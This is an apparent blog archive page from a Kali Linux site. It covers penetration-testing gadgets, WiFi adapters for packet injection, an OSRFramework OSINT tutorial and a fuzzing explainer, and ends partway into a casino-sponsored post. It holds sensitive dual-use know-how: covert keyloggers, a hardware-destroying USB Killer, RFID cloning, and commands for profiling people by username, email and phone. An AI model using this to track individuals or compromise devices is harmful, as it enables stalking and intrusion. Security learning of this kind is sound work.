Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security.

15 Powerful Gadgets For Ethical Hackers | Hardware Tools for Hackers in 2021

15 Powerful Gadgets For Ethical Hackers | Hardware Tools for Hackers in 2021

Our in this platform we usually talk about various applications and their uses to check loopholes on systems. But penetration testers not only uses software applications, they also need some hardware to perform the tasks. In this detailed article we are going to cover hardware devices & gadgets used by an ethical hacker. Let’s start with a warning.

Warning:- This article is written for educational purpose only. To make it more ethical, we just only talk about the hardware devices publicly available in Amazon. Using these devices on our own for educational purpose isn’t crime, but using these devices against others without proper permission is illegal. So use these devices responsibly, we and Amazon will not be responsible for talking and selling these kind of product.

Hardwares and gadgets used by hackers

Lets start with a computer, most of cybersecurity experts prefer laptops, not desktops because laptops are portable. We had wrote an entire article about best laptops for Kali Linux, Moving forward ethical hackers uses some other hardware devices that is our main topic for today.

1. Raspberry Pi 4

Raspberry Pi dominating the market of single board computers (SBC). This device used by almost every security personals.

Raspberry pi

This is very useful we can install entire Kali Linux on this credit card sized computer. Raspberry Pi also can be used in many other projects. Cybersecurity experts use it on various way. We can see in Mr. Robot Season 1 Episode 5, how Elliot hacked the climate control network to destroy magnetic tapes.

There are unlimited uses of raspberry pi for an ethical hacker. This device is a must have for everyone on infosec field.

buy Raspberry Pi on amazon

2. Raspberry Pi Zero W

This is a small handheld computer, ideal for carrying the best penetration testing software tools, and to handle all the external hardware hacking tools. The most known Cybersecurity distro for it is P0wnP1 A.L.O.A. and Kali Linux. P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W. The successor of P4wnP1 is called P4wnP1 A.L.O.A. We recommend the USB type-A pongo-pin adapter shown in the above picture.

We also can use it a headless system (without monitor). This device connected with a power bank in our bag and we can control it from our mobile device on our hand(using VNC).

buy from amazon

3. USB Rubber Ducky

usb rubber ducky

USB Rubber ducky is created and developed by Hak5. Nearly every computing devices accepts human input from keyboards, hence the ubiquitous HID specification – or Human Interface Device. Keyboards announce themselves to computers as HID devices and are in turn automatically recognized and accepted.

The USB Rubber Ducky delivers powerful payloads in seconds by taking advantage of the target computers inherent trust all while deceiving humans by posing as an ordinary USB drive.

In simple words, if we plug it on a computer, the computer think it is a keyboard and it will inject (type, save and execute) our preset payload on the computer. There are lots of payload available for this device. Also we can easily write our own code.

This is one of the bast way to compromise a system having physical access.

buy from amazon

4. WiFi Pineapple

The Wi-Fi pineapple is the original Wi-Fi attack tool developed by Hak5. There are three different models available from Hak5. They all are good, here we choose Mark VII model for it’s value for money.

Wifi pineeapple

This will automate the auditing of WiFi networks and saves the results. We can control it with awesome web based interface. This is really a very good product for security testing o wireless networks.

buy from amazon

5. HackRF One

HackRF One from Great Scott Gadgets is a Software Defined Radio peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz. Designed to enable test and development of modern and next generation radio technologies. We can read and manipulate radio frequencies using this device.

hackrf one

HackRF One is an open-source hardware platform that can be used as a USB peripheral or programmed for stand- alone operation. This SDR offers one important improvement compared to other cheap alternatives. But the Radio Frequency (RF) quality isn’t good as expected.

buy from amazon

6. Ubertooth One

Ubertooth One is the most famous Bluetooth hacking tool we can find on the market. It is an open source 2.4 GHz wireless development platform suitable for Bluetooth hacking. Commercial Bluetooth monitoring equipment can easily be priced at over $10,000 , so the Ubertooth was designed to be an affordable alternative platform for monitoring and development of new BT, BLE and similar wireless technologies.

ubertooth

Ubertooth One is designed primarily as an advanced Bluetooth receiver, offering capabilities beyond that of traditional adapters, which allow for it to be used as a BT signal sniffing and monitoring platform. Although the device hardware will accommodate signal broadcasting, the firmware currently only supports receiving and minimal advertising channel transmission features.

buy from amazon

7. WiFi Deauther Watch

As the name said it’s a deauther, it de-authenticate the WiFi users and they got disconnected. It’s not a jammer. It uses ESP8266 WiFi development board to do so. Here it’s watch version is looks super cool gadget for every hacker.

wifi deauther

While a jammer just creates noise on a specific frequency range (i.e. 2.4 GHz), a deauthentication attack is only possible due to a vulnerability in the Wi-Fi (802.11) standard. The deauther does not interfere with any frequencies, it is just sending a few Wi-Fi packets that let certain devices disconnect. That enables us to specifically select every target. A jammer just blocks everything within a radius and is therefore highly illegal to use.

buy from amazon

8. USB Killer

Computers doesn’t check the current flowing through USB, because it uses computers own power and can’t transmit more voltage. But what if we took an advantage of this to burn our (using on others is totally illegal) entire system.

USB Killer

When plugged into a device, the USB Killer rapidly charges its capacitors from the USB power lines. When the device is charged, -200VDC is discharged over the data lines of the host device. This charge/discharge cycle is repeated many times per second, until the USB Killer is removed. As the result target device becomes burned and unrepairable.

Its compact size and flash-drive style housing makes it an important device in every pen-tester’s toolkit. It can be used multiple times as we want.

buy from amazon

9. Bad USB

This is a super alternative of USB Rubber Ducky. This device contains customized HW based on Atmega32u4 and ESP-12S. This device allows keystrokes to be sent via Wi-Fi to a target machine. The target recognizes the Ducky as both a standard HID keyboard and a serial port, allows interactive commands and scripts to be executed on the target remotely.

bad usb with wifi

Attacker can easily carry it as a thumb drive and plug into any PC to inject payload, running own command on it, it also can be controlled over WiFi. It looks like innocent USB thumb drive, which is a great advantage. But this is doesn’t have faster speed like USB Rubber Ducky.

buy from amazon

10. Hardware Keylogger

A hardware keylogger can be inserted between USB keyboard and computer. It captures all the keystrokes made from the keyboard, must have thing for every cybersecurity expert.

hardware keylogger

This is a basic hardware keylogger. It has 16 MB storage. Which is sufficient to capture keystrokes for a year generally. Later we can remove it and plug on our computer to read the keystrokes. Some keyloggers comes with WiFi controlling and SMS controlling functionality. No software can detect it’s there.

buy from amazon

11. Adafruit Bluefruit LE Sniffer

Adafruit luefruit LE Friend is programmed with a special firmware image thatturns it into an easy to use Bluetooth Low Energy sniffer. We can passively capture data exchanges between two Bluetooth Low Energy (BLE) devices, pushing the data into Wireshark, the open source network analysis tool, where you can visualize things on a packet level, with useful descriptors to help us make sense of the values without having to crack open the 2000 page Bluetooth 4.0 Core Specification every time.

ble sniffer

Note: We can only use this device to listen on Bluetooth Low Energy devices! It will not work on Bluetooth (classic) devices. Firmware V2 is an improved firmware from Nordic now has better Wireshark-streaming sniffer software that works with all OS for live-streamed BLE sniffing. The sniffer firmware cannot be used with the Nordic DFU bootloader firmware, which means that if we want to reprogram this device you must use a J-Link (and a SWD programmer board). We cannot over-the-air (OTA) reprogram it.

buy from amazon

12. Micro-controllers

There are lots of micro-controllers used by ethical hackers. Some of them are must have in a ethical hackers backpack.

NodeMCU ESP8266

nodemcu esp8266

ESP8266 is a $6 WiFi development board and it can be used in various way, we can make WiFi deauther by our own. It also can be used to create phishing pages over WiFi.

buy from amazon

Arduino Pro Micro

This tiny micro-controller is one of the best choice for ethical hackers. We can make our own DIY USB Rubber Ducky.

Arduio pro micro

Arduino Pro Micro is really good thing at a very low price. But if we want to change the script then we need to reset and upload new script on it from our computer.

buy from amazon

13. RTL-SDR

RTL-SDR is a very cheap software defined radio that uses a DVB-T TV tuner dongle based on the RTL2832U chip-set.

rtl sdr devices

It can be used to intercept radio frequencies. We can use it for listening others conversations. It is also able to intercept GSM mobile calls and SMS. It is very useful for cybersecurity experts.

buy from amazon

14. Proxmark3 NFC RFID Card Reader

Owning a Promark3 means owing the most powerful and most complete device RFID/NFC (LF & HF) testing in the frequencies of 125KHz / 134KHz / 13.56MHz.

promark 3

This devices can make read the data of RFID and NFC cards and then make a copy of it. We can write the new copies on blank cards provided with this package. We we need more we can buy more blank cards on Amazon.

Therefore, investing some more bucks in upgrading it, it’s not a bad idea. To improve its range we need the extended range antennas for LF and HF.

Another new and nice upgrade for it, is the Blue Shark Bluetooth 2.0 upgrade, that permits controlling the proxmark3 wirelessly plus adding an external battery to create an autonomous proxmark3 that can be connected and controlled from your computer or smartphone. The Walrus NFC application has been updated to permit control by Bluetooth. It also fixes the high temperature concerns adding a metal cooler.

buy from amazon

WiFi Adapters (Monitor Mode & Packet Injection)

wifi adapter for kali linux

WiFi adapter specially which supports monitor mode and packet injection is essential for WiFi penetration testing. So most of the hackers uses it. We had noticed that Alfa makes awesome adapters for cyber-security personals. We already discussed it on our Best WiFi adapter for Kali Linux article. Please check out that article before buying an WiFi adapter.

Wifi adapter price on amazon

Something Extra

This is the gadgets for hackers we can directly buy from Amazon and help us on our ethical hacking journey. There are some more gadgets used by hackers but talking about them will be not ethical here. Most of them manufactured from china and available on some online stores. There are some cool stores like Hak5, but in this article we discussed about some gadgets which are openly available on Amazon.

Warning:- Using the above devices is not illegal. They are selling publicly on Amazon. But using these devices to harm anyone is totally illegal. We listed them for educational purpose and to safe ourselves from these kind of devices. If anyone uses this devices to harm anyone then we are not responsible for that, Amazon also not responsible. So use this devices responsibly, always remember:

Spiderman is also Anonymous

That’s for today. Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

Best USB WiFi Adapter For Kali Linux 2021 [Updated July]

Best USB WiFi Adapter For Kali Linux 2021 [Updated July]

Best Kali Linux WiFi Adapter

The all new Kali Linux 2021.1 was rolling out and we can simply use it as our primary operating system because of the non-root user. The main benefit of using Kali Linux as primary OS is we got the hardware support. Yes, we can do our all penetration testing jobs with this Kali Linux 2021, but to play with wireless networks or WiFi we need some special USB WiFi adapters in Kali.
Best WiFi Adapter for Kali Linux

Here we have listed some best USB Wireless adapters Kali Linux in 2021. These WiFi adapters are 100% compatible with Kali Linux and supports monitor mode and packet injection, which will help a lot in WiFi penetration testing.

Best WiFi Adapter for Kali Linux

Sl No.
WiFi Adapter
Chipset
Best for
Buy
1
AR9271
Good Old Friend
2
RT 3070
Best in it’s Price Range
3
RT 3070
Compact and Portable
4
RT 5572
Stylish for the Beginners
5
RTL8812AU
Smart Look & Advanced
6
RTL8814AU
Powerful & Premium
7
RT5372
Chip, Single Band

Alfa AWUS036NH

We are using this USB WiFi adapter from the BackTrack days (before releasing Kali Linux) and still we consider it as one of the best. For it’s long range signals we can do our penetration testing jobs from a long distance.

Alfa AWUS036NHA Kali Linux WiFi Adapter 2020

Alfa AWUS036NH is plug and play and compatible with any brand 802.11g or 802.11n router using 2.4 GHz wavelength and supports multi-stream & MIMO (multiple input multiple output) with high speed transfer TX data rate up to 150 MBPS. It also comes with a clip which can be used to attach this adapter on a laptop lid.

    1. Chipset: Atheros AR 9271.
    2. Compatible with any brand 802.11b, 802.11g or 802.11n router using 2.4 Ghz wave-length.
    3. Includes a 5 dBi omni directional antenna as well as a 7 dbi panel antenna.
    4. Supports security protocols: 64/128-bit WEP, WPA, WPA2, TKIP, AES.
    5. Compatible with Kali Linux RPi with monitor mode and packet injection.
    6. High transmitter power of 28 dBm – for long-rang and high gain WiFi.
      https://www.amazon.com/Alfa-AWUS036NH-802-11g-Wireless-Long-Range/dp/B003YIFHJY/ref=as_li_ss_tl?dchild=1&keywords=Alfa+AWUS036NHA&qid=1594882122&sr=8-6&linkCode=ll1&tag=adaptercart-20&linkId=2f09cf7cc9b84fcd2be61c590af1d25c&language=en_US

      Alfa AWUS036NHA

      Alfa again. Alfa provides the best WiFi adapters for Kali Linux. This adapter is the older version of Alfa AWUS036NH with Ralink RT3070 chipset. AWUS036NHA is the IEEE 802.11b/g/n Wireless USB adapter with 150 Mbps speed This is also compatible with IEEE 802.11b/g wireless devices at 54 Mbps.

      Alfa AWUS036NH Kali Linux WiFi Adapter 2020

      This plug and play WiFi adapter supports monitor mode and packet injection in any Linux distribution and Kali Linux. Alfa AWUS036NHA comes with a 4 inch 5 dBi screw-on swivel rubber antenna that can be removed and upgrade up to 9 dBi.

        1. Chipset: Ralink RT 3070.
        2. Comes with a 5 dBi omni directional antenna as well as a 7 dBi panel antenna.
        3. Supports security protocols: 64/128-bit wep, wpa, wpa2, tkip, aes
        4. Compatible with Kali Linux (Also in Raspberry Pi) with monitor mode and packet injection.
          https://www.amazon.com/Alfa-AWUS036NH-802-11g-Wireless-Long-Range/dp/B003YIFHJY/ref=as_li_ss_tl?dchild=1&keywords=Alfa+AWUS036NH&qid=1594870855&s=amazon-devices&sr=8-1&linkCode=ll1&tag=adaptercart-20&linkId=4c49c0097d6157190cf04122e27714ed&language=en_US

          Alfa AWUS036NEH

          This Alfa WiFi Adapter is compact and tiny, but it has a good range. It supports plug and play so connect it with Kali Linux machine and start playing with WiFi security. The antenna is detachable and makes it very portable. We have used this to build our portable hacking machine with Raspberry Pi and Kali Linux.

          Alfa AWUS036NEH Kali Linux WiFi Adpater 2020

          Alfa AWUS036NEH is the ultimate solution for going out and red teaming attacks. The long high gain WiFi antenna will give us enough range to capture even low signal wireless networks. This adapter is slim and doesn’t require a USB cable to use.

            1. Chipset: Ralink RT 3070.
            2. Supports monitor mode and packet injection on Kali Linux and Parrot Security on RPi.
            3. Compact and portable.
              https://www.amazon.com/AWUS036NEH-Range-WIRELESS-802-11b-USBAdapter/dp/B0035OCVO6/ref=as_li_ss_tl?dchild=1&keywords=Alfa+AWUS036NEH&qid=1594870918&sr=8-3&linkCode=ll1&tag=adaptercart-20&linkId=c6578f6fb090f86f9ee8917afba3199a&language=en_US

              Panda PAU09 N600

              Besides Alfa, Panda is also a good brand for WiFi adapters with monitor mode. Panda PAU09 is a good WiFi adapter to buy in 2020. This dual-band plug & play adapter is able to attack both 2.4 GHz as well as 5 GHz 802.11 ac/b/g/n WiFi networks.

              Panda PAU09 WiFi adapter for monitor mode

              This adapter comes with a USB docker and dual antennas, which looks really cool. It is also detachable into smaller parts. This adapter is reliable even on USB 3 and works great and fully supports both monitor mode and injection which is rare on a dual band wireless card out of the box.

                1. Chipset: Ralink RT5572.
                2. Supports monitor mode and packet injection on Kali Linux, Parrot Security even in RPi.
                3. 2 x 5dBi antenna.
                4. It comes with a USB stand with a 5 feet cable.
                5. Little bit of heating issue (not so much).
                  https://www.amazon.com/Panda-Wireless-PAU09-Adapter-Antennas/dp/B01LY35HGO/ref=as_li_ss_tl?dchild=1&keywords=Panda+PAU09&qid=1594870963&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUEzRUUwQjNVSkNGMEFIJmVuY3J5cHRlZElkPUEwODkwNzI3MkZHWUFNUTBRMlRTQSZlbmNyeXB0ZWRBZElkPUEwNzkxNzgzMTBaUEdDS05IUzdDTSZ3aWRnZXROYW1lPXNwX2F0ZiZhY3Rpb249Y2xpY2tSZWRpcmVjdCZkb05vdExvZ0NsaWNrPXRydWU=&linkCode=ll1&tag=adaptercart-20&linkId=d9d43db491c7cf14863cc99c1b8b7797&language=en_US

                  Alfa AWUS036ACH / AC1200

                  In Kali Linux 2017.1 update Kali Linux was released a significant update – support for RTL8812AU wireless chipset. Now Alfa AWUS036ACH is a BEAST. This is a premium WiFi adapter used by hackers and penetration testers. It comes with dual antennas and dual band technology (2.4 GHz 300 Mbps/5 GHz 867 Mbps) supports 802.11ac and a, b, g, n.

                  Alfa AWUS036ACH WiFi adapter for Kali Linux

                  These antennas are removable and if we require higher range, then we can connect an antenna with greater dbi value and use it as a long range WiFi link which makes this one of the best WiFi adapters. Also this adapter has an awesome look.

                  If budget is not an issue then this adapter is highly recommended.

                    1. Chipset: RealTek RTL8812AU.
                    2. Dual-band: 2.4 GHz and 5 GHz.
                    3. Supports both monitor mode & packet injection on dual band.
                    4. Premium quality with high price tag.
                      https://www.amazon.com/Alfa-Long-Range-Dual-Band-Wireless-External/dp/B00VEEBOPG/ref=as_li_ss_tl?dchild=1&keywords=Alfa+AWUS036ACH&qid=1594871102&sr=8-3&linkCode=ll1&tag=adaptercart-20&linkId=928256b6b245a63277f865d406f44c02&language=en_US

                      Alfa AWUS1900 / AC1900

                      Now this is the beast, then why is it at last? It is last because of its high price range. But the price is totally worth it for this USB WiFi adapter. If the previous adapter was a beast then it is a monster. Alfa AWUS1900 has high-gain quad antenna that covers a really long range (500 ft in an open area).

                      This is a dual band WiFi adapter with high speed capability 2.4GHz [up to 600Mbps] & 5GHz [up to 1300Mbps]. It also has a USB 3.0 interface.

                      Alfa AWUS036ACH The best wifi adapter for hacking in Kali Linux

                      Monitor mode and packet injection supported with both bands and it will be very useful for serious penetration testers. We also can attach this on our laptop display with it’s screen clip provided with the box.

                      What we got in the box?

                      • 1 x AWUS1900 Wi-Fi Adapter
                      • 4 x Dual-band antennas
                      • 1 x USB 3.0 cable
                      • 1 x Screen clip
                      • 1 x Installation DVD-Rom (doesn’t require on Kali Linux. Plug&Play)
                      • A consistent solution for network congestion!
                        1. Chipset: RealTek RTL8814AU.
                        2. Dual-band: 2.4 GHz and 5 GHz.
                        3. Supports both monitor mode & packet injection on dual band.
                        4. Premium quality with high price tag.
                        5. Very long range.
                          https://www.amazon.com/Alfa-AC1900-WiFi-Adapter-Long-Range/dp/B01MZD7Z76/ref=as_li_ss_tl?dchild=1&keywords=Alfa+AWUS036ACH&qid=1594871169&sr=8-4&linkCode=ll1&tag=adaptercart-20&linkId=d62c81825eace1b0f09d0762e84881c4&language=en_US

                          Panda PAU 06

                          Yes, This low cost Panda PAU 06 WiFi adapter supports Monitor Mode and Packet Injections. But we really don’t suggest to buy this adapter if budget is not an issue.
                          panda pau 06 wifi adapter for Kali Linux
                          The main reason is this WiFi adapter doesn’t supports dual-band frequency (only supports 2.4GHz), it doesn’t supports 5GHz frequency.
                          This WiFi adapter comes with Ralink RT5372 chipset inside it. 802.11n standards supports 300MB per second maximum speed.
                          This adapter takes less power from computer, but other adapters doesn’t took too much power from system (this point is negligible).
                          panda pau 06 order on amazon

                          Extras

                          There are some more WiFi adapters that we did not cover because we didn’t test them on our hands. These WiFi adapters were owned by us and some of our friends so we got a chance to test these products. We didn’t listed some WiFi adapters like following:

                          Be Careful to choose from these, because we don’t know that they surely support monitor mode & packet injection or not. As per our own experience Alfa cards are the best in the case of WiFi Hacking.

                          How to Choose Best Wireless Adapter for Kali Linux 2020

                          Before going through WiFi adapter brands let’s talk something about what kind of WiFi adapter is best for Kali Linux. There are some requirements to be a WiFi penetration testing wireless adapter.

                          • Should support Monitor mode.
                          • The ability to inject packets and capture packets simultaneously.

                          Here are the list of WiFi motherboards supports Monitor mode and Packet injection.

                          • Atheros AR9271 (only supports 2.4 GHz).
                          • Ralink RT3070.
                          • Ralink RT3572.
                          • Ralink RT5370N
                          • Ralink RT5372.
                          • Ralink RT5572.
                          • RealTek 8187L.
                          • RealTek RTL8812AU (RTL8812BU & Realtek8811AU doesn’t support monitor mode).
                          • RealTek RTL8814AU

                          So we need to choose WiFi Adapter for Kali Linux carefully. For an Example, on the Internet lots of old and misleading articles that describe TP Link N150 TL-WN722N is good for WiFi security testing. But it is not true. Actually it was.

                          TP Link N150 TL-WN722N newer models don't support Monitor Mode
                          TP Link N150 TL-WN722N newer models doesn’t work

                          The TP Link N150 TL-WN722N’s previous versions support monitor mode. The version 1 comes with Atheros AR9002U chipset and supports monitor mode. Version 2 has the Realtek RTL8188EUS chipset and doesn’t support monitor mode or packet injection. TP Link N150 TL-WN722N version 1 is not available in the market right now. So clear these things and don’t get trapped.

                          Which WiFi adapter is the best? Vote Please

                           
                          pollcode.com free polls

                          WiFi Hacking in Kali Linux

                          Kali Linux is the most widely used penetration testing operating system of all time. It comes with lots of tools pre-installed for cyber security experts and ethical hackers. We can perform web application penetration testing, network attack as well as wireless auditing or WiFi hacking. We have already posted some lots of tutorials on our website and some good WiFi auditing tutorials like AirCrack-Ng.

                          Why Do We Use External USB WiFi Adapters in Kali Linux?

                          A WiFi adapter is a device that can be connected to our system and allows us to communicate with other devices over a wireless network. It is the WiFi chipset that allows our mobile phone laptop or other devices which allows us to connect to our WiFi network and access the internet or nearby devices.

                          But most of the Laptops and mobile phones come with inbuilt WiFi chipset so why do we need to connect an external WiFi adapter on our system ? Well the simple answer is our in-built WiFi hardware is not much capable to perform security testing in WiFi networks.Usually inbuilt WiFi adapters are low budget and not made for WiFi hacking, they don’t support monitor mode or packet injection.

                          If we are running Kali Linux on Virtual Machine then also the inbuilt WiFi Adapter doesn’t work for us. Not even in bridge mode. In that case we also need an external WiFi adapter to play with WiFi networks. A good external WiFi adapter is a must have tool for everyone who has interest in the cyber security field.

                           
                          WSL2 installation of Kali Linux will not support any kind (Inbuilt or External) of Wi-Fi adapters.

                          Kali Linux Supported WiFi Adapters

                          Technically almost every WiFi adapter supports Kali Linux, but those are useless on WiFi hacking if they don’t support monitor mode and packet injection. Suppose, we buy a cheap WiFi adapter under $15 and use it to connect WiFi on Kali Linux. That will work for connecting to wireless networks but we can’t play with networks.

                          It doesn’t make sense, when we are using Kali Linux then we are penetration testers so a basic WiFi adapter can’t fulfill our requirements. That’s why we should have a special WiFi adapter that supports monitor mode and packet injection. So in this tutorial Kali Linux supported means not only supported it means the chipset has ability to support monitor mode and packet injection.

                          What is Monitor Mode

                          Network adapters, whether it is wired or wireless, are designed to only capture and process packets that are sent to them. When we want to sniff a wired connection and pick up all packets going over the wire, we put our wired network card in “promiscuous” mode.

                          In wireless technology, the equivalent is monitor mode. This enables us to see and manipulate all wireless traffic passing through the air around us. Without this ability, we are limited to using our WiFi adapter to only connect to wireless Access Points (APs) that accept and authenticate us. That is not what we are willing to settle for.
                          In the Aircrack-ng suite, we need to be able to use airodump-ng to collect or sniff data packets.

                          What is Packet Injection

                          Most WiFi attacks require that we are able to inject packets into the AP while, at the same time, capturing packets going over the air. Only a few WiFi adapters are capable of doing this.

                          WiFi adapter manufacturers are not looking to add extra features to their standard wireless adapters to suit penetration testers needs. Most wireless adapters built into your laptop are designed so that people can connect to WiFi and browse the web and send mails. We need something much more powerful and versatile than that.

                          If we can’t inject packets into the Access Point (in Aircrack-ng, this is the function of Aireplay-ng), then it really limits what we do.

                          If we are using Kali Linux and want to be a security tester or ethical hacker then a special WiFi adapter is a must have tool in our backpack. As per our own experience listed Alfa cards in this list are best USB wireless adapter for Kali Linux, going with them may be costly but they are really worth it. For more assistance comment below we reply each and every comment.

                          We are also in Twitter join us there. Our Telegram group also can help to choose the best WiFi adapter for hacking and Kali Linux.
                          OSRFramework — Open Source Research Framework

                          OSRFramework — Open Source Research Framework

                          OSRFramework is an awesome open-source OSINT tool. This is a set of libraries to perform Open Source Intelligence tasks. They include references to a bunch of different applications related to username checking, DNS lookups, information leaks research, deep web search, regular expressions extraction, and many others. This is a very good information gathering framework for gathering information against corporate sectors as well as an individual.

                          osrframework on kali linux

                          Introduction & Installation

                          OSRFramework didn’t comes pre-installed on our Kali Linux system but we can install it easily with Kali Linux repository. To install it we need to run following command on our Kali Linux terminal, sudo apt install osrframework. But this osrframework is the older version, some things not properly works. 

                          The newer version is available on PyPI, to use this we need to use pip install command.

                          Before installing, let us know some details about this framework. OSRFramework have some tool set, we can use them in order to collect information from various sources. They are following:

                          • Domainfy: Checks whether domain names that use words and extensions are available.
                          • Mailfy: Gets information about emails taken as a reference either a nickname (to generate a list of possible emails) or the email list.
                          • Chechfy: Guesses possible emails based on a list of candidate nicknames and a pattern.
                          • Phonefy: Recovers information about mobile phones linked to known spam practices.
                          • Searchfy: Finds profiles linked to a full name.
                          • Usufy: Identifies social media profiles using a given nickname.
                          • Alais_generator: Find a person from all over the internet.

                          So first of all we need to update our system by using following command:

                          sudo apt update -y

                          Then we need to install python3-pip and python-setuptoools by using followinng command:

                          sudo apt install python3-pip python-setuptools

                          Now we are ready to install OSRFramework. To install it we run following command on our terminal:

                          sudo pip install osrframework

                          The above command will clone OSRFramework on our system as we can see on the following screenshot:

                          installing osrframework on kali linux

                          This command will start installing OSRFramework, it might take couple of minutes to finish it depending on our internet connection speed.

                          Now we are ready to run it. We can check help of every component or modules by putting the module name with -h flag on our terminal. For an example for checkfy help we can type checkfy.py -h on our terminal to check checkfy’s help.

                          phonefy help options

                          In this detailed article we are going to cover all these modules on OSRFramework. Let’s start.

                          Domainfy

                          By using domainfy we can gain information about domains. This framework will begin querying whois and provide the results in a table format after a few seconds. In our example, we have used the following command:

                          domainfy.py --whois -n google

                          On the following screenshot we can see the information table of domain called “google”.

                          domainfy tutorial

                          We also can use -t option to check all the domain extension for a domain name. For an example if we want to look for websites available for “kali” name.

                          We need to use following command:

                          domainfy.py -n kali -t all

                          On the following screenshot we can see that all the domains available with this name.

                          domainfy domain extensions checking

                          Usufy

                          If we know an username of someone then we can search it on everywhere (all over the social media sites) by using usufy module. For an example we know an username “KaliLinux_in”, so we need to run following command on our terminal to hunt this username:

                          usufy.py -n KaliLinux_in

                          Then it will start searching this username on more than 200 social media sites. In our case it took more then 4 minutes (Sherlock might be faster then usufy). In the following screenshot we can see it got our Twitter (follow to get updated) handle.

                          usufy on osrframework

                          It also saves the output file on our home directory.

                          Mailfy

                          we can attempt to obtain the email addresses of a given search string. In this example, we are attempting to discover email addresses that contain the “kalilinux” string, which has been used on various websites on the internet. We can begin by using the following command:

                          mailfy.py -n kalilinux

                          In the following screenshot we can see that mailfy havegot some email address on the internet:

                          mailfy on osrframework

                          It also check the founded mails on social media platforms.

                          Searchfy

                          By using the Searchfy module on OSRFramework we can check for a string all over the OSRFramework, a name, a domain, social media profile etc. We need to use it with -q flag. For an example we search for “Elon Musk” by using following command:

                          searchfy.py -q "Elon Musk"

                          On the following screenshot we can see lots of results comes in:

                          searchfy osrframework

                          Here one thing, Elon Musk is famous personality we may encounter with many fake profiles on the internet.

                          Phonefy

                          We can check telephone number leakage is simple with Phonefy in OSRFramework. We can run it by using following command:

                          phonefy.py -n 959750585

                          In the following screenshot we can see that here is some results as link about this phone number.

                          phonefy on osrframework

                          But personally we think WhitePages are batter then this for searching a phone number.

                          Alias_Generator

                          Alias_generator is a module that tries to generate possible user names based on personal information. It works in interactive mode (no need flags), so lets run it by using following command:

                          alias_generator.py

                          Then it will ask us some information about our target like,

                          1. Name.
                          2. First surname.
                          3. Second surname.
                          4. A Year (ex Birthyear).
                          5. Insert a city.
                          6. Country.
                          7. Some extra words.

                          If we leave a point blank we need to just press enter to skip it. In the following screenshot we have searched for someone’s username:

                          Alias_generator.py

                          On the above screenshot we have a list with possible usernames. We can search this usernames on social media using Sherlock or usufy.

                          Final Talks

                          We need to have latest Python and pip installed on our system to run OSRFramework. To upgrade this framework we need to run following command:

                          sudo pip install osrframework --upgrade

                          As we have seen, OSRFramework is another very powerful tool within the Kali Linux platform. Using a tool such as this can save us a lot of time during our information-gathering process.

                          Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

                          What is Fuzzing? Why it is Important on Cybersecurity?

                          What is Fuzzing? Why it is Important on Cybersecurity?

                          What is Fuzzing?

                          Fuzz testing or Fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated task.

                          This analysis is a software-testing technique used by developers and penetration testers to test their applications against unexpected, invalid, and random sets of data input. The response will then be noticed in terms of an exception or a crash thrown by the application. This activity shows us some of the major vulnerabilities in the application, which are not possible to discover otherwise. These covers buffer overflows, format strings, code injections, dangling pointers, race conditions, denial of service conditions, and many other types of vulnerabilities.

                          Fuzzy analysis is a relatively simple and effective solution that can be incorporated into the quality assurance and security testing processes. That’s why fuzzy analysis is also called robustness testing or negative testing sometimes.

                          History of Fuzzing

                          Classic fuzz testing was developed at the University of Wisconsin Madison in 1989 by Professor Barton Miller and students. Their (continued) work can be found here. It’s mostly oriented towards command-line and UI fuzzing, and shows that modern operating systems are vulnerable to even simple fuzzing.

                          Attack types in Fuzzing

                          Commonly a Fuzzer (program for fuzzing) would try combinations of attacks on:

                          • numbers (signed/unsigned integers/float etc).
                          • chars (urls, command-line inputs).
                          • metadata : user-input text (id3 tag).
                          • pure binary sequences.

                          A common approach to fuzzing is to define lists of “known-to-be-dangerous values” (fuzz vectors) for each type, and to inject them or re-combinations.

                          • For integers: zero, possibly negative or very big numbers.
                          • For chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands etc).
                          • For binary: random ones.
                          • For chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands etc).

                          There are different classes of fuzzers available in Kali Linux, which can be used to test the file formats, network protocols, command-line inputs, environmental variables, and web applications. Any non-trusted source of data input is considered to be insecure and inconsistent. For instance, a trust boundary between the application and the Internet user is unpredictable. Thus, all the data inputs should be fuzzed and verified against known and unknown vulnerabilities. In our some later article we are going to learn about Fuzzers on our Kali Linux system.

                          Why Fuzzing is important on Security Testing?

                          The purpose of fuzzing based on the assumption that there are bugs within every program, which are waiting to be discovered. Then, a systematic approach should find them sooner or later.

                          Fuzzing can add another perspective to classical software testing techniques (hand code review, debugging) because of it is non-human approach. It doesn’t replace them, but is a reasonable complement, thanks to the limited work needed to put the procedure in place.

                          References

                          Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

                          Top Online Casinos in India choose Linux for Server Security

                          Top Online Casinos in India choose Linux for Server Security

                          Online casinos in India have got maximum popularity in terms of the games and promotions they offer. A person can’t find all these promotions and 2000+ games over a land-based casino; hence, online casinos in India have increased by 10X. Also, covid-19 contributed to the growth of online casinos in India as more and more people were attracted to playing casino games.

                          Linux servers

                          Moreover, these online casinos provide convenient payment options such as UPI, which accepts Indian rupees. However, the top priority of online casinos in India has always been utmost security. What online casinos in India want is tight security for their players so that their money isn’t lost anywhere.

                          Not only money but their data remains in secured hands. Hence, they’ve lately been focusing on improving their cybersecurity. When server security comes into action, the name of the Linux operating system appears at the top. 

